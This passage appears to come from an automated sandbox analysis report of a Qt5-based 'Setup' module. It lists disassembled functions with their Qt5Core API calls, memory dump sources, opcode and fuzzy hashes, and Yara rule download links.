                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$String@@$?size@$Ref@@$?qstrcmp@@DateTime@@V0@@$?clear@?mid@V0@$$$?at@?compare@CaseLongLong@Qt@@@Sensitivity@memchr
                                                                                                                                                              • String ID: ()<>@,;:\"/[]?={}
                                                                                                                                                              • API String ID: 969840310-547710970
                                                                                                                                                              • Opcode ID: 035a88b31aa5ed894826a65bf024aee277b7bcec4af6328ec09aa48cb2819504
                                                                                                                                                              • Instruction ID: 56105c10adf48339f677c1defa4eefae2caaef599c2c30bd83264ed215997537
                                                                                                                                                              • Opcode Fuzzy Hash: 035a88b31aa5ed894826a65bf024aee277b7bcec4af6328ec09aa48cb2819504
                                                                                                                                                              • Instruction Fuzzy Hash: FF6185A1A0E54392EFA2DF31E8501BD6365EF50B98F404036DE5E466B5EF2CE64ACF00
                                                                                                                                                              Function 00007FFBA19723C0 Relevance: 40.6, APIs: 27, Instructions: 148timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$V0@@$A@$$$Data@@Empty@List$?at@?dispose@?lock@Data@1@@DateHash@@Locker@@MutexMutex@@Time@@Url@@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2483256921-0
                                                                                                                                                              • Opcode ID: 2e8bcd223dfbe1c8660ac55772b4ff6c8d59650ac372128c7ca104a3f367e2be
                                                                                                                                                              • Instruction ID: 848b303be960ad0ddd6d181639555f5d3c8608a88356de3fef13b8087bd5c02f
                                                                                                                                                              • Opcode Fuzzy Hash: 2e8bcd223dfbe1c8660ac55772b4ff6c8d59650ac372128c7ca104a3f367e2be
                                                                                                                                                              • Instruction Fuzzy Hash: 79711BA2B1AA07A5EB81DB70E8540FC2371FF54B58B804032CE1E57A65EF3CE55ACB40
                                                                                                                                                              Function 00007FFBA197EA30 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 146COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$FileInfo@@$?scheme@Dir@@Formatting$?exists@ComponentEmpty@Flags@Option@$?authority@?compare@?dir@?size@CaseFile@Latin1LocalOption@2@@@@Qt@@@Sensitivity@String@String@@@Url@@@@@V0@@
                                                                                                                                                              • String ID: qrc
                                                                                                                                                              • API String ID: 3580839574-1673588963
                                                                                                                                                              • Opcode ID: 78cce0f30f7ee10f668a8e84c3de64449defa0ee937595379679c75a0c23d5fb
                                                                                                                                                              • Instruction ID: 7c66e3765fd3a3cf957fb444e8aa60c4af9497e6c64e4f39d25f59cd72daa2f9
                                                                                                                                                              • Opcode Fuzzy Hash: 78cce0f30f7ee10f668a8e84c3de64449defa0ee937595379679c75a0c23d5fb
                                                                                                                                                              • Instruction Fuzzy Hash: CB5160A2F0AA1285FB82DB75D8542F82760BF45758F840432DD2F57694EF3CD58ACB20
                                                                                                                                                              Function 00007FFBA1A041F0 Relevance: 39.2, APIs: 26, Instructions: 209COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListString@@$?begin@$Array@@ByteChar@@V0@@$?dispose@?index?mid@CaseChar@@@Data@1@@Latin1Qt@@@Sensitivity@$?append@?detach_grow@?end@?size@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2681142159-0
                                                                                                                                                              • Opcode ID: 377210dce88e77032021e091e369d478922bfd13325ac08176e39ebff8e54cef
                                                                                                                                                              • Instruction ID: c2d6cbe0703215b9c92bda373b7505e116d9f51c4d41377b9c9d6a1f8e90188e
                                                                                                                                                              • Opcode Fuzzy Hash: 377210dce88e77032021e091e369d478922bfd13325ac08176e39ebff8e54cef
                                                                                                                                                              • Instruction Fuzzy Hash: 4F919072B0AA1296EB518F31E8841BC2775FF44BA9F554132CE2E57694EF3CE44ACB00
                                                                                                                                                              Function 00007FFBA1986A30 Relevance: 37.7, APIs: 25, Instructions: 185COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@Byte$V0@@$?end@$?dispose@Data@1@Data@1@@$?append@?detach@?detach_grow@?realloc@?size@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1400189274-0
                                                                                                                                                              • Opcode ID: a45f9f61b037276c06e7570b44995e830f2c78104f8739214cf36093b843a0aa
                                                                                                                                                              • Instruction ID: 42c49888e3b22575b74a359ff3aaac4557f8528485614755df4f139d2df929b5
                                                                                                                                                              • Opcode Fuzzy Hash: a45f9f61b037276c06e7570b44995e830f2c78104f8739214cf36093b843a0aa
                                                                                                                                                              • Instruction Fuzzy Hash: 637192B2F0AA1286EF919F26E8441786761FB85BA5F458131CE1E0B754EF3CE446CF00
                                                                                                                                                              Function 00007FFBA1A02B70 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Char@@String@@$?begin@?end@Latin1$?contains@CaseChar@@@Qt@@@Sensitivity@$Empty@String@@@
                                                                                                                                                              • String ID: <local>
                                                                                                                                                              • API String ID: 460053324-4266983199
                                                                                                                                                              • Opcode ID: f8551dbbb66634763ee0f4650ece08757dd3338494a50727436a7a1f856e7893
                                                                                                                                                              • Instruction ID: 6da0376bc24411b47ec745246ca7dab40954bea725d8d2d2bc273319b95bfc05
                                                                                                                                                              • Opcode Fuzzy Hash: f8551dbbb66634763ee0f4650ece08757dd3338494a50727436a7a1f856e7893
                                                                                                                                                              • Instruction Fuzzy Hash: 0DD1B4B2B0AA0295EFA29F31D4502FD2769AF41B98F444137CD6E17794EE3CD84ACB10
                                                                                                                                                              Function 00007FFBA1993B90 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 103timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Date$Array@@Time@@$String@@$V0@@$?qstrcmp@@$?size@$Data@@ListRef@@Url@@V0@$$$?add?begin@?clear@?current?end@?host@ComponentFlags@FormattingOption@Secs@TimeUrl@@@@@Utc@V1@_Valid@memchr
                                                                                                                                                              • String ID: Strict-Transport-Security
                                                                                                                                                              • API String ID: 2136714095-1819463772
                                                                                                                                                              • Opcode ID: 8928ea74853f3a1f36e49ecda5d58f3e0e1ba77204909c75ad8c2365382a8ba9
                                                                                                                                                              • Instruction ID: 8c95fc2adf9b71a4a770c13a4562529146f437b18d6fc6d90f3decccca8aacf1
                                                                                                                                                              • Opcode Fuzzy Hash: 8928ea74853f3a1f36e49ecda5d58f3e0e1ba77204909c75ad8c2365382a8ba9
                                                                                                                                                              • Instruction Fuzzy Hash: 9A416CA2E0AA5289EB81CF72E8441FC2771BB54B98F444432DD1E57A68EF3CD54ACB40
                                                                                                                                                              Function 00007FFBA197D100 Relevance: 36.2, APIs: 24, Instructions: 198COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isEmpty@QListData@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D111
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D172
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D17B
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D189
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D197
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D1B7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D228
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D236
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D25E
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA197D272
                                                                                                                                                              • ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA197D286
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA197D292
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA197D2A4
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA197D2C7
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA197D2E2
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA197D2EE
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA197D316
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197D368
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA197D376
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA197D37F
                                                                                                                                                              • ?append@QListData@@QEAAPEAPEAXAEBU1@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D39B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D3A7
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D3B3
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,00000000,00007FFBA197D72B), ref: 00007FFBA197D3D7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@ByteV0@@$?end@$?dispose@Data@1@Data@1@@String@@$?append@?detach@?detach_grow@?size@Empty@U1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3847276358-0
                                                                                                                                                              • Opcode ID: 66cbb431cb531932b30b2e4e84b807ebdb5760111dbdc30fa76c77e047c7f506
                                                                                                                                                              • Instruction ID: 495e112efdc96e504a2ede68f7441e2e6b351b58995c4dda616ab9ce5f87e410
                                                                                                                                                              • Opcode Fuzzy Hash: 66cbb431cb531932b30b2e4e84b807ebdb5760111dbdc30fa76c77e047c7f506
                                                                                                                                                              • Instruction Fuzzy Hash: D8814DB2A0AA0686DF919F25E8441B963A1FF85BA9F484131DE5E07764EF3CE446CB10
                                                                                                                                                              Function 00007FFBA19ED410 Relevance: 34.6, APIs: 23, Instructions: 136timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?simplified@QString@@QEGBA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED441
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED44B
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED45F
                                                                                                                                                              • ?contains@QString@@QEBA_NVQChar@@W4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED472
                                                                                                                                                              • ??0QStringRef@@QEAA@PEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED488
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED494
                                                                                                                                                              • ?lastIndexOf@QStringRef@@QEBAHVQChar@@HW4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED4AB
                                                                                                                                                              • ?mid@QStringRef@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED4CA
                                                                                                                                                              • ?toString@QStringRef@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED4D7
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED4E4
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED4EE
                                                                                                                                                              • ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED4F8
                                                                                                                                                              • ?size@QStringRef@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED502
                                                                                                                                                              • ?chop@QStringRef@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED510
                                                                                                                                                              • ?clear@QString@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED51C
                                                                                                                                                              • ?constEnd@QStringRef@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED526
                                                                                                                                                              • ?constData@QStringRef@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED533
                                                                                                                                                              • ?parseIp6@QIPAddressUtils@@YAPEBVQChar@@AEAY0BA@EPEBV2@1@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED543
                                                                                                                                                              • ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED550
                                                                                                                                                              • ?constEnd@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED593
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED5A0
                                                                                                                                                              • ?parseIp4@QIPAddressUtils@@YA_NAEAIPEBVQChar@@1@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED5B0
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000000,00000001,00007FFBA19EDA56), ref: 00007FFBA19ED5EB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char@@String@@$Ref@@String$?const$?child?parseAddressCaseChar@@@ChildEnd@Event@Event@@@Latin1Object@@Qt@@@Sensitivity@Utils@@$?chop@?clear@?contains@?data@?last?mid@?simplified@?size@Char@@1@Data@DateEmpty@IndexIp4@Ip6@String@String@@@Time@@V0@$$V0@@V2@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3059913857-0
                                                                                                                                                              • Opcode ID: 9dd76a5d1c3b4c8d624a39abfff872f2bdab0fe58cbe8e9f29a07dff51ec4340
                                                                                                                                                              • Instruction ID: e712d6786e5cf5f425f9012cdb07ddf305d42cdc6cc7ba140b881ecc317659c8
                                                                                                                                                              • Opcode Fuzzy Hash: 9dd76a5d1c3b4c8d624a39abfff872f2bdab0fe58cbe8e9f29a07dff51ec4340
                                                                                                                                                              • Instruction Fuzzy Hash: 02517F72A0AA129AEB41CB75D8441BC37B1FB14B68F444136CE1E47A94EF3CE59ACB40
                                                                                                                                                              Function 00007FFBA1A36CB0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 246timewindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QDate@@QEAA@HHH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A36E98
                                                                                                                                                              • ??0QTime@@QEAA@HHHH@Z.QT5CORE ref: 00007FFBA1A36EBE
                                                                                                                                                              • ??0QDateTime@@QEAA@AEBVQDate@@AEBVQTime@@W4TimeSpec@Qt@@@Z.QT5CORE ref: 00007FFBA1A36ED6
                                                                                                                                                              • ?addSecs@QDateTime@@QEBA?AV1@_J@Z.QT5CORE ref: 00007FFBA1A36EE7
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A36EF4
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A36EFE
                                                                                                                                                              • ??0QDateTime@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A36F0B
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A36F15
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A36F43
                                                                                                                                                              • ??0QDate@@QEAA@HHH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A36FE2
                                                                                                                                                              • ??0QTime@@QEAA@HHHH@Z.QT5CORE ref: 00007FFBA1A37008
                                                                                                                                                              • ??0QDateTime@@QEAA@AEBVQDate@@AEBVQTime@@W4TimeSpec@Qt@@@Z.QT5CORE ref: 00007FFBA1A37020
                                                                                                                                                              • ??0QDateTime@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A3702D
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A37037
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A3704A
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A3706E
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A3707E
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A37087
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
